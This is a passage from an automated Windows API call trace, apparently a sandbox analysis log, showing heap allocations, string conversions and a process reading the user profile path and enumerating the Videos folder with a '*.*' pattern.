0x2e51238 [0257.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0257.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0257.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0257.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0257.037] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3e0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0257.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0257.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0257.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0257.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0257.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0257.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0257.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e54858 [0257.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0257.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0257.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0257.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0257.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0257.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b98 [0257.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0257.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0257.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0257.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0257.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b68 [0257.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0257.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0257.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0257.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51070 [0257.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0257.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0257.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0257.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0257.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0257.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0257.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0257.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0257.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0257.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0257.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0257.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0257.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0257.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0257.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0257.038] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0257.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0257.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0257.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0257.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0257.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0257.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0257.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0257.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0257.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0257.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0257.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0257.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0257.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0257.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0257.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0257.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0257.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0257.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0257.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0257.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0257.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0257.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0257.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0257.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0257.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0257.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54738 [0257.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0257.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0257.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0257.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0257.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0257.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0257.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0257.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0257.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0257.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0257.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0257.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0257.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0257.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0257.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0257.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0257.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0257.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0257.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0257.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0257.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0257.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0257.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0257.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0257.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0257.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0257.040] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0257.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0257.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0257.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0257.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0257.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0257.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0257.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0257.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0257.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0257.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0257.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0257.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0257.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0257.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0257.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0257.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0257.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0257.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0257.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0257.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9) returned 0x2e51598 [0257.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x2e51598, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/]+\\z", lpUsedDefaultChar=0x0) returned 9 [0257.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0257.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x52) returned 0x2e58910 [0257.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51370 [0257.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\FD1HVy\\Videos", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0257.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x17) returned 0x2e69b68 [0257.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\FD1HVy\\Videos", cchWideChar=23, lpMultiByteStr=0x2e69b68, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\FD1HVy\\Videos", lpUsedDefaultChar=0x0) returned 23 [0257.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0257.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0257.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0257.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2e) returned 0x2e56098 [0257.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0257.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0257.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0257.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0257.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0257.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0257.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0257.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0257.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0257.043] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2e546c0, cbMultiByte=23, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 23 [0257.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2e) returned 0x2e559d0 [0257.043] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2e546c0, cbMultiByte=23, lpWideCharStr=0x2e559d0, cchWideChar=23 | out: lpWideCharStr="C:\\Users\\FD1HVy\\Videos") returned 23 [0257.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0257.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f80 [0257.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e559d0 | out: hHeap=0x970000) returned 1 [0257.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0257.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0257.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f80 | out: hHeap=0x970000) returned 1 [0257.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0257.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0257.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0257.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0257.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0257.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0257.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0257.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0257.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54800 | out: hHeap=0x970000) returned 1 [0257.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0257.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0257.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0257.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0257.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0257.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0257.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0257.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0257.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0257.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0257.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0257.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e58910 [0257.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56098 | out: hHeap=0x970000) returned 1 [0257.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0257.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0257.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0257.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0257.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0257.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0257.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0257.044] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0257.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0257.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0257.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0257.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0257.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0257.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0257.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0257.044] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\" (normalized: "c:\\users\\fd1hvy\\videos")) returned 0x11 [0257.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0257.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0257.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0257.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0257.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0257.045] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0257.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0257.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0257.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0257.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0257.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0257.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0257.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0257.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0257.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0257.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0257.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0257.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0257.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0257.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0257.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0257.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0257.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0257.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x17) returned 0x2e69ac8 [0257.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x2e69ac8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", lpUsedDefaultChar=0x0) returned 23 [0257.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0257.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0257.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0257.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x59) returned 0x2e558d8 [0257.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513d0 [0257.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0257.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0257.046] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x2e54dc8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*.*", lpUsedDefaultChar=0x0) returned 4 [0257.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0257.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0257.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0257.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0257.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0257.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545a8 | out: hHeap=0x970000) returned 1 [0257.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0257.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0257.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0257.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0257.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0257.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0257.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0257.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0257.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0257.046] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0257.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0257.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0257.046] RtlAllocateHeap 